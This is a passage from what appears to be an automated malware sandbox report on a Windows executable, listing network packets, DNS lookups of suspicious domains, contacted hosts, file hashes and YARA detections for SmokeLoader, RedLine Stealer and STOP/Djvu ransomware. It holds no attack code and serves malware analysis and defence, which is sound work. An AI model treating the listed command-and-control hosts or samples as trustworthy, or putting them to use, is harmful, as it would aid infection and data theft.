                                                                                    Feb 7, 2023 19:44:46.862343073 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862392902 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862442970 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862492085 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862540007 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862567902 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.862637997 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862685919 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862756968 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.862935066 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.862965107 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863015890 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863063097 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863106012 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863106012 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.863171101 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906440973 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906534910 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906580925 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906630039 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906687021 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906748056 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906778097 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906893015 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906944036 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906955957 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906991959 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907037973 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907042027 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.907881021 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907934904 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907979965 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908025980 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908029079 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.908057928 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.908618927 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908668995 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908714056 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908740044 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.908760071 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908766985 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.909514904 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909563065 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909589052 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.909609079 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909656048 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909728050 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.910384893 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.910444021 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.910479069 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.910597086 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955492020 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955538988 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955564976 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955588102 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955683947 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955744028 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955765963 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955770016 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955796957 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955821037 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955846071 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955873966 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.956593037 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956629992 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956656933 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956681013 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956685066 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.956732035 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.957412004 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957448006 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957499981 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.957518101 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957545042 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957988977 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.958277941 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958318949 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958343983 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958369017 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958388090 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.958425045 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.959188938 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959223032 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959249020 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959274054 CET8049697188.114.96.3192.168.2.3
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Feb 7, 2023 19:44:46.530975103 CET192.168.2.38.8.8.80xd71eStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:01.171063900 CET192.168.2.38.8.8.80x5d0Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:03.833204985 CET192.168.2.38.8.8.80xf00fStandard query (0)flytourchip.com.brA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:04.918548107 CET192.168.2.38.8.8.80xee27Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:05.436633110 CET192.168.2.38.8.8.80x93abStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:34.826117039 CET192.168.2.38.8.8.80x29e1Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:41.806687117 CET192.168.2.38.8.8.80xfc92Standard query (0)xv.yxzgamen.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:47.377264977 CET192.168.2.38.8.8.80x36eeStandard query (0)iueg.aappatey.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:53.661890984 CET192.168.2.38.8.8.80x3dbbStandard query (0)xv.yxzgamen.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.348076105 CET192.168.2.38.8.8.80xe0b6Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.582577944 CET192.168.2.38.8.8.80x6340Standard query (0)siaoheg.aappatey.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.575400114 CET192.168.2.38.8.8.80xa3e2Standard query (0)perficut.atA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:56.694607973 CET192.168.2.38.8.8.80x2fbeStandard query (0)perficut.atA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.098745108 CET192.168.2.38.8.8.80xfe0fStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.370901108 CET192.168.2.38.8.8.80xe71aStandard query (0)perficut.atA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Feb 7, 2023 19:44:46.554482937 CET8.8.8.8192.168.2.30xd71eNo error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:44:46.554482937 CET8.8.8.8192.168.2.30xd71eNo error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:01.191075087 CET8.8.8.8192.168.2.30x5d0No error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:01.191075087 CET8.8.8.8192.168.2.30x5d0No error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:04.151479006 CET8.8.8.8192.168.2.30xf00fNo error (0)flytourchip.com.br158.69.96.67A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:04.941478014 CET8.8.8.8192.168.2.30xee27No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:05.458060026 CET8.8.8.8192.168.2.30x93abNo error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:05.458060026 CET8.8.8.8192.168.2.30x93abNo error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:34.843812943 CET8.8.8.8192.168.2.30x29e1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:34.843812943 CET8.8.8.8192.168.2.30x29e1No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:41.829817057 CET8.8.8.8192.168.2.30xfc92No error (0)xv.yxzgamen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:41.829817057 CET8.8.8.8192.168.2.30xfc92No error (0)xv.yxzgamen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:47.396763086 CET8.8.8.8192.168.2.30x36eeNo error (0)iueg.aappatey.com45.66.159.142A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:53.683685064 CET8.8.8.8192.168.2.30x3dbbNo error (0)xv.yxzgamen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:53.683685064 CET8.8.8.8192.168.2.30x3dbbNo error (0)xv.yxzgamen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.369381905 CET8.8.8.8192.168.2.30xe0b6No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.603955984 CET8.8.8.8192.168.2.30x6340No error (0)siaoheg.aappatey.com45.66.159.142A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at189.156.154.174A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at189.143.172.107A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at190.219.54.242A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at138.36.3.134A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at222.236.49.123A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at190.219.54.242A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at138.36.3.134A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at222.236.49.123A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at189.156.154.174A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at189.143.172.107A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.118758917 CET8.8.8.8192.168.2.30xfe0fNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at189.156.154.174A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at189.143.172.107A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at190.219.54.242A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at138.36.3.134A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at222.236.49.123A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                    • flytourchip.com.br
                                                                                    • api.2ip.ua
                                                                                    • www.facebook.com
                                                                                    • xv.yxzgamen.com
                                                                                    • qmxjpgcre.net
                                                                                      • potunulit.org
                                                                                    • mxhagj.org
                                                                                    • idkcje.org
                                                                                    • dxwvikrtgo.org
                                                                                    • usbhmmnst.net
                                                                                    • nqnoakwgow.net
                                                                                    • scuexnvs.com
                                                                                    • tmafbpv.org
                                                                                    • 77.73.134.27
                                                                                    • fjgurrg.com
                                                                                    • yxysrc.org
                                                                                    • vrtsdpwuux.com
                                                                                    • saeqmrs.com
                                                                                    • auuuhpc.com
                                                                                    • tpniggi.com
                                                                                    • fxqslbplw.net
                                                                                    • fixgfsjkdd.org
                                                                                    • mhfgwrr.org
                                                                                    • 62.204.41.134
                                                                                    • iueg.aappatey.com
                                                                                    • siaoheg.aappatey.com
                                                                                    • esvui.net
                                                                                      • perficut.at
                                                                                    • xacanotyi.org
                                                                                    • coaqka.com

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:19:43:58
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\file.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:198144 bytes
                                                                                    MD5 hash:17A74A0281CEFB5D9C29022FBC79981A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low

                                                                                    Target ID:4
                                                                                    Start time:19:44:10
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                    Imagebase:0x7ff69fe90000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Target ID:11
                                                                                    Start time:19:44:46
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\4113.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4113.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:387584 bytes
                                                                                    MD5 hash:B141BC58618C537917CC1DA179CBE8AB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 82%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Target ID:12
                                                                                    Start time:19:44:47
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Roaming\sievwvt
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\sievwvt
                                                                                    Imagebase:0x400000
                                                                                    File size:198144 bytes
                                                                                    MD5 hash:17A74A0281CEFB5D9C29022FBC79981A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 49%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Target ID:13
                                                                                    Start time:19:44:47
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 62%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Target ID:14
                                                                                    Start time:19:44:59
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    Imagebase:0x7b0000
                                                                                    File size:7722496 bytes
                                                                                    MD5 hash:B328ABE938AE81E9382BD6858A6EE77F
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\A33B.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    Reputation:low

                                                                                    Target ID:15
                                                                                    Start time:19:45:02
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low

                                                                                    Target ID:16
                                                                                    Start time:19:45:02
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    Imagebase:0x140000000
                                                                                    File size:3657728 bytes
                                                                                    MD5 hash:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 77%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Target ID:17
                                                                                    Start time:19:45:04
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\E4.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\E4.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:198656 bytes
                                                                                    MD5 hash:29C3DE14DFFA53EDC7E690D0FC0ECCE2
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                    Target ID:18
                                                                                    Start time:19:45:05
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ECFB.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\ECFB.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:200192 bytes
                                                                                    MD5 hash:3A452937E8A961C5E19974C2CBB4AFAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
